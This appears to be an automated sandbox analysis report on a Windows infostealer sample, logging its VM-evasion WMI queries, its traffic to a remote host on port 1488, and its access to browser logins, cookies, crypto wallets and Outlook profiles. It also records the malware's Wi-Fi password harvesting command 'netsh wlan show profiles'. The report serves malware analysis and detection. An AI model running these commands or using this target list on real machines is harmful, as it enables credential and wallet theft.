    Source: Binary string: mscorlib.ni.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Management.ni.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Core.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Configuration.pdbH source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Net.Http.ni.pdbRSDS source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Management.ni.pdbRSDS6 source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.ni.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Core.ni.pdbRSDS source: WERF69D.tmp.dmp.19.dr
    Source: T05Dk6G8fg.exeStatic PE information: 0xF3548553 [Thu May 14 00:44:03 2099 UTC]
    Source: initial sampleStatic PE information: section where entry point is pointing to: .oqo
    Source: T05Dk6G8fg.exeStatic PE information: section name: .qyy
    Source: T05Dk6G8fg.exeStatic PE information: section name: .{oA
    Source: T05Dk6G8fg.exeStatic PE information: section name: .oqo
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_0152B097 push esp; retf 1_2_0152B0A9
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02D420A4 push 00000002h; ret 1_2_02D4213D
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CD8444 pushad ; retf 053Bh1_2_06CD8561
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CDD3A0 push ds; retf 1_2_06CDD3A1
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_08188EFD push ss; retf 1_2_08188F02
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_08181AE6 push esp; retf 1_2_08181AE7
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_08181B48 push esp; retf 1_2_08181B49
    Source: T05Dk6G8fg.exeStatic PE information: section name: .oqo entropy: 7.732257971934118

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49382 -> 1488
    Source: unknownNetwork traffic detected: HTTP traffic on port 1488 -> 49382
    Source: unknownNetwork traffic detected: HTTP traffic on port 1488 -> 49382
    Source: unknownNetwork traffic detected: HTTP traffic on port 1488 -> 49382
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_PointingDevice
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Model, Size FROM Win32_DiskDrive
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, Speed FROM Win32_NetworkAdapter WHERE MACAddress IS NOT NULL
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Description, MACAddress, IPEnabled FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = TRUE
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Default FROM Win32_Printer
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DeviceID, FileSystem, FreeSpace, Size FROM Win32_LogicalDisk WHERE DriveType = 3
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_SoundDevice
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeMemory allocated: 1520000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeMemory allocated: 2EE0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeMemory allocated: 2CF0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeMemory allocated: 53B0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeMemory allocated: 73B0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeMemory allocated: 75F0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeMemory allocated: 95F0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02D40FA4 sgdt fword ptr [ecx+edx*8]1_2_02D40FA4
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02D40E30 sidt fword ptr [edi+ecx*8]1_2_02D40E30
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWindow / User API: threadDelayed 667Jump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWindow / User API: threadDelayed 9193Jump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer, SMBIOSBIOSVersion, ReleaseDate FROM Win32_BIOS
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Product, Manufacturer, SerialNumber FROM Win32_BaseBoard
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: T05Dk6G8fg.exe, 00000001.00000002.43972510147.0000000001062000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeMemory allocated: page read and write | page guardJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklistJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpBA88.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpBA88.tmp.batJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 2956Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /NobreakJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 2956Jump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeQueries volume information: C:\Users\user\Desktop\T05Dk6G8fg.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Lowering of HIPS / PFW / Operating System Security Settings

    barindex
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: T05Dk6G8fg.exe, 00000001.00000002.43981548376.0000000005624000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

    Stealing of Sensitive Information

    barindex
    Source: T05Dk6G8fg.exe, 00000001.00000002.43974342595.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumlB7rx
    Source: T05Dk6G8fg.exe, 00000001.00000002.43974342595.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxxLiberty
    Source: T05Dk6G8fg.exe, 00000001.00000002.43974342595.0000000002F27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $7r4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
    Source: T05Dk6G8fg.exe, 00000001.00000002.43974342595.0000000002F27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $7r1C:\Users\user\AppData\Roaming\Ethereum\keystoret-7r
    Source: T05Dk6G8fg.exe, 00000001.00000002.43974342595.0000000002F74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
    Source: T05Dk6G8fg.exe, 00000001.00000002.43974342595.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
    Source: T05Dk6G8fg.exe, 00000001.00000002.43974342595.0000000002F27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $7r5C:\Users\user\AppData\Local\Coinomi\Coinomi\walletst-7r
    Source: T05Dk6G8fg.exe, 00000001.00000002.43990776194.0000000070A8B000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: get_MachineKeyStore
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7tydjrzc.default-release\key4.dbJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7tydjrzc.default-release\cookies.sqliteJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
    Source: Yara matchFile source: Process Memory Space: T05Dk6G8fg.exe PID: 2956, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid Accounts731
    Windows Management Instrumentation
    1
    Scripting
    1
    DLL Side-Loading
    111
    Disable or Modify Tools
    1
    OS Credential Dumping
    1
    File and Directory Discovery
    Remote Services1
    Archive Collected Data
    1
    Ingress Tool Transfer
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    DLL Side-Loading
    11
    Process Injection
    2
    Obfuscated Files or Information
    LSASS Memory134
    System Information Discovery
    Remote Desktop Protocol2
    Data from Local System
    1
    Encrypted Channel
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Software Packing
    Security Account Manager831
    Security Software Discovery
    SMB/Windows Admin Shares1
    Email Collection
    11
    Non-Standard Port
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Timestomp
    NTDS54
    Virtualization/Sandbox Evasion
    Distributed Component Object Model1
    Clipboard Data
    3
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA Secrets2
    Process Discovery
    SSHKeylogging3
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts54
    Virtualization/Sandbox Evasion
    Cached Domain Credentials1
    Application Window Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
    Process Injection
    DCSync1
    System Network Configuration Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568332 Sample: T05Dk6G8fg.exe Startdate: 04/12/2024 Architecture: WINDOWS Score: 100 42 15.55.7.0.in-addr.arpa 2->42 44 icanhazip.com 2->44 50 Suricata IDS alerts for network traffic 2->50 52 Antivirus / Scanner detection for submitted sample 2->52 54 Sigma detected: Capture Wi-Fi password 2->54 56 4 other signatures 2->56 8 T05Dk6G8fg.exe 15 31 2->8         started        signatures3 process4 dnsIp5 46 89.23.100.233, 1488, 49382 MAXITEL-ASRU Russian Federation 8->46 48 icanhazip.com 104.16.184.241, 49380, 80 CLOUDFLARENETUS United States 8->48 58 Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines) 8->58 60 Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines) 8->60 62 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 8->62 64 10 other signatures 8->64 12 cmd.exe 1 8->12         started        15 cmd.exe 1 8->15         started        17 WerFault.exe 22 16 8->17         started        20 cmd.exe 1 8->20         started        signatures6 process7 file8 66 Uses netsh to modify the Windows network and firewall settings 12->66 68 Tries to harvest and steal WLAN passwords 12->68 22 tasklist.exe 1 12->22         started        